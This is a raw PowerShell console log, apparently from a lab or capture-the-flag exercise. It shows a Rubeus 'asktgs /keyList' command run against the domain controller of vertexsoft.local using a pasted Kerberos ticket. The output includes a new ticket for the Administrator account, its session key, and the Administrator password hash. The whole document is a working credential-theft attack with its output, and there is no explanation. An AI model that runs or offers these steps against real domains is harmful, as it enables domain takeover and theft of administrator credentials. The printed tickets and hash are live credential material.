doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELoKzb+PkW3EYmwomEc3t1w4VGLaCNUGvnuks2UhHorQfEjIxzY29xl/X1B7j10yhedzB1eWLcccCw2HZ6vHQiOF+uls8cgQnQso0F7LJAfuGpHA95g7cDanliapWdmMJdKX3m6gPd9Xlc0TTDw6HI+62KxMKw4XJIEnf4BeYB++iFB61SbE4Zr9JjttF5bq5Lv28ljcr/1pkeKkSlxNqn63PufgsiTqqb70GZ1hpXBXazmBRAZCRdVf2lO/l4qIja6ISPm2mp10HKdN4J7a9DOCYMffvCKvFxL6Wjzd8J7gZabRJt9EIP9asl2BPEvkKjIBaMx8Eh42McSuh0jkWs1IMpMoT9xMXmiMnPC2C8Mlhsd3QvS5VmvgAK27XvW9HK7PcZkkWwP1MHHY+KzJueZMv6fvuOaUGj+fJvHLwRUD/RdjFKYUz2yWo8/djyUrDQhTVPOqbw0hBYmESjSuLjZAuTUlX8MBWqE0FZOc/+DlKwzYOItbblJLkjpGsUO0+BwVdLwubZalX5K+Xeq0d5gPC12Sxfc+pSkcB5n8nUlG3Sl6EHn/PKaTu24FczcYNGZht3pfZISJBXZ4K63Fd7/1TI6czqoQ2MzIL9PF2ot5DhRSxGaC3TFoeT48u04xrfWmzhQNMCu1XQkKgMjDCnFB5btnKTH1EWYFHz9KlmxwknARTsoyOc4Sb8EtLkkRPYImsDhEMGqkvf17HKln+/wwDjlv8ozr4SzPgaYCeSf+aahzGqDPAE50YtZKeF4evgNNd6YH6qTsmUaksS65i7p7e/QEWMtfgz3/3ge/fC1DcLoxAX7lqn8WeVEodASuCeSmqluY6wKeFi62YDFhm5bY4TxDGo9Kqt4+0auwM34jn9RBe6JeY4raPzUf6zEDFabvjCOURPGpw6Gi9AnXkKyf7QQVue6AVJP/DBQIcgewSSY8YvLf4FG18hdiX5JMTGYYPmQMnAhLB8YhhnlZHNYfrydMdh5pwJJ+145MD9jMWsYagkYWRFcW4fJmTDFyY1yaBTNKsdA9shwWpjpZS97eEFpPXPeDHzoOWq+jy5Dc1gsVZ6muLsl6m63+uCZsGjtriG6QqlxExNPAXAIrgSUkrT/zXVA/iiDkVV2VcyjDpGbazuNMJqs9w6ZvQhIPUiX5TFZUu659DmntSDlqLAz/uaOAhutvB8gEq5ZgE/Hx0PiphlQZjGRZsu/kGokx94kYapIgt1AUsQcoPSM64pD2Fsa1nLAjBz35yFrDdLvrA1iZ3UckAV4xkljtDvj8n5UIYo86dcZWfn7uiG0Mls0sEihukxM4l5tJzAJPiYdF4kFMc/W2e7k8KRzjsp7lCdsDPO8VwHUNrSwd1Nu+amOPR0oZkHN+t7LBPSwAeMJTmUaP7fy798LQBDJLR38eZduCVpDFcyLx6Q6nC1FUeo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQa/cb042YAReAeKzVzIw3daESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2NDUxNFqlERgPMjAyNjAxMjIxNjQ1MTRaphEYDzIwMjYwMTIzMDI0NTE0WqcRGA8yMDI2MDEyOTE2NDUxNFqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==
PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket:doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELoKzb+PkW3EYmwomEc3t1w4VGLaCNUGvnuks2UhHorQfEjIxzY29xl/X1B7j10yhedzB1eWLcccCw2HZ6vHQiOF+uls8cgQnQso0F7LJAfuGpHA95g7cDanliapWdmMJdKX3m6gPd9Xlc0TTDw6HI+62KxMKw4XJIEnf4BeYB++iFB61SbE4Zr9JjttF5bq5Lv28ljcr/1pkeKkSlxNqn63PufgsiTqqb70GZ1hpXBXazmBRAZCRdVf2lO/l4qIja6ISPm2mp10HKdN4J7a9DOCYMffvCKvFxL6Wjzd8J7gZabRJt9EIP9asl2BPEvkKjIBaMx8Eh42McSuh0jkWs1IMpMoT9xMXmiMnPC2C8Mlhsd3QvS5VmvgAK27XvW9HK7PcZkkWwP1MHHY+KzJueZMv6fvuOaUGj+fJvHLwRUD/RdjFKYUz2yWo8/djyUrDQhTVPOqbw0hBYmESjSuLjZAuTUlX8MBWqE0FZOc/+DlKwzYOItbblJLkjpGsUO0+BwVdLwubZalX5K+Xeq0d5gPC12Sxfc+pSkcB5n8nUlG3Sl6EHn/PKaTu24FczcYNGZht3pfZISJBXZ4K63Fd7/1TI6czqoQ2MzIL9PF2ot5DhRSxGaC3TFoeT48u04xrfWmzhQNMCu1XQkKgMjDCnFB5btnKTH1EWYFHz9KlmxwknARTsoyOc4Sb8EtLkkRPYImsDhEMGqkvf17HKln+/wwDjlv8ozr4SzPgaYCeSf+aahzGqDPAE50YtZKeF4evgNNd6YH6qTsmUaksS65i7p7e/QEWMtfgz3/3ge/fC1DcLoxAX7lqn8WeVEodASuCeSmqluY6wKeFi62YDFhm5bY4TxDGo9Kqt4+0auwM34jn9RBe6JeY4raPzUf6zEDFabvjCOURPGpw6Gi9AnXkKyf7QQVue6AVJP/DBQIcgewSSY8YvLf4FG18hdiX5JMTGYYPmQMnAhLB8YhhnlZHNYfrydMdh5pwJJ+145MD9jMWsYagkYWRFcW4fJmTDFyY1yaBTNKsdA9shwWpjpZS97eEFpPXPeDHzoOWq+jy5Dc1gsVZ6muLsl6m63+uCZsGjtriG6QqlxExNPAXAIrgSUkrT/zXVA/iiDkVV2VcyjDpGbazuNMJqs9w6ZvQhIPUiX5TFZUu659DmntSDlqLAz/uaOAhutvB8gEq5ZgE/Hx0PiphlQZjGRZsu/kGokx94kYapIgt1AUsQcoPSM64pD2Fsa1nLAjBz35yFrDdLvrA1iZ3UckAV4xkljtDvj8n5UIYo86dcZWfn7uiG0Mls0sEihukxM4l5tJzAJPiYdF4kFMc/W2e7k8KRzjsp7lCdsDPO8VwHUNrSwd1Nu+amOPR0oZkHN+t7LBPSwAeMJTmUaP7fy798LQBDJLR38eZduCVpDFcyLx6Q6nC1FUeo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQa/cb042YAReAeKzVzIw3daESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2NDUxNFqlERgPMjAyNjAxMjIxNjQ1MTRaphEYDzIwMjYwMTIzMDI0NTE0WqcRGA8yMDI2MDEyOTE2NDUxNFqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting 'rc4_hmac' etype for the service ticket
[*] Building KeyList TGS-REQ request for: 'Administrator'
[*] Using domain controller: DC.vertexsoft.local (192.168.1.11)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFxjCCBcKgAwIBBaEDAgEWooIE3TCCBNlhggTVMIIE0aADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyi
JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEFZFUlRFWFNPRlQuTE9DQUyjggSNMIIEiaADAgESoQMCAQKiggR7
BIIEd2YbzcmKvx1992XQ8acUjSl8x/G9KpOZjVqridcaqGOnkQFFtHaDUn72vo+qiMGSh3Nfz5XhdYaG
ZStlHae1FVV74sop6JG7DkNNvQjc1BWHuZOCMaJJWqZEETyplhv+L3iJe/cSgJHNEnW8BfTva85ZG7Iw
I2kV+EuEMGcXB1Hl31QdNWSmjCHWdA2ZxgKAttlSyX/B9DvjW/aJyG57dyFrHGvpmcpwdcGARSXe8RcX
m1F+GyhFXiTs9Ca7aPGwWDZoiMA7Fe8Xd86QgvhKFl9R6I2k86qYQCE+qQ35VCGkzCTAcnuJmQnj4PCA
Glsfi02iJLni1PDiBdHn+kwXQ13Ptirh5oUffB/xFPC+js1ww3NAoYpudkkUcfvrwin5jNIIi7D4rj8L
PBhsJbUjajcHUiNt45cB2kDN1xV/B/DSWNv1FBa99j+gQ3YXzrmJvn0u9croNfLm/ezxE87oHmo17RCP
DrNSTzCl7pt8epDhDyDbQqfBYSZJPFIN3KOJtLXwjzsjYWRuDfG2uCNsLoZqJpR4pJC1glgPLjXVu/Ur
sX/HY9r0TIvwHFXaEha7vYc6UCn7u+iun4Mp54AGGSG9j2YaNg7SbYOVaxn3MP/E8JkaXEK+uuWN6VBH
lDcZAOJmbO3cWHtA02UZwxfAU3YaXE3lbA/c7UiYv3rfZkiDK+8+CHGNWnLop/k+HYLLrhkY9016JA63
V4hEl9vGcCKtuMV2qINCAoj5XqwE88+0DFdF/fsQQPuoX2xNKS2Q47pwkaNx3dwSlYix03CZOVPtVkpa
8Se672v9Cug5y61QZ6Fkcw3sqq8dwzRmWAGs0NyvzjNnwz11HEv60Mf4ser+43nbsCxYxJ5TnQh93fkL
c4DkQS50Mb8voly7eyo0V0jDG8bvPD1/+i57RUkV83igfI+dchLq0mkdjOJTUDs+aS8t1qPM3InrOm8T
m1aYV9x12whc7onrkR2zlH9FwL8L7ODwEIC4TcqQdA/sNl27BdUGkJomTDh3Ao6gIncRgBa2rzD2bFVg
MPMZCx8zc9DF/atFPYcop+qdMwIreHNqPz2ziuOM9JQF7+JInllkiYRBxhb/hwDK9v1LczyLpm18ZcKh
hlY1X8PO5fJHBM6ZWqU15oqLtiztHrXnbj3Ava5j5OAK54KRtUd1shqZNS60JSl3J3OQeLJWNmAlEO/u
M21CT2ancZTdjOrtKQqqzhmhlGrY24XLxGEN7Tkf1uEvDWntu8PXzFhl0a4APa/WUSy5r6iF0jQ7hPuZ
M6sKRAMp15r5iKiLYnUUdm5vJsBi9MszWrQ8LuAy38XzEzDzbcoeagLVLxUDTCmDTdi8m8B8A/Oa6ApA
PBD06UhR7G+HSGsdwB9TJm3wER2X6j3RgtBwPMi5eZSXsduOQPt7GSaJINetswwqTatSuz7+97bNtN1y
T6q969n2YPVqmsYD5zNS1tz5C6OckySXZrI/wFFvRxhorwOyglYevuid/5qv4VPieW1Vas1/NfInHYrm
x2gH6eyUGKOB1DCB0aADAgEAooHJBIHGfYHDMIHAoIG9MIG6MIG3oBswGaADAgEXoRIEEBwJtJZcTbEC
z6FVFdfkIYahEhsQVkVSVEVYU09GVC5MT0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMF
AAAhAAClERgPMjAyNjAxMjIxNjQ1MzFaphEYDzIwMjYwMTIzMDI0NTE0WqgSGxBWRVJURVhTT0ZULkxP
Q0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBWRVJURVhTT0ZULkxPQ0FM
ServiceName : krbtgt/VERTEXSOFT.LOCAL
ServiceRealm : VERTEXSOFT.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : VERTEXSOFT.LOCAL
StartTime : 1/23/2026 12:45:31 AM
EndTime : 1/23/2026 10:45:14 AM
RenewTill : 1/1/0001 8:00:00 AM
Flags : name_canonicalize, pre_authent
KeyType : rc4_hmac
Base64(key) : HAm0llxNsQLPoVUV1+Qhhg==
Password Hash : EBC447441306783742EE3DF769051B75
PS C:\Users\CharlieCloud\Desktop>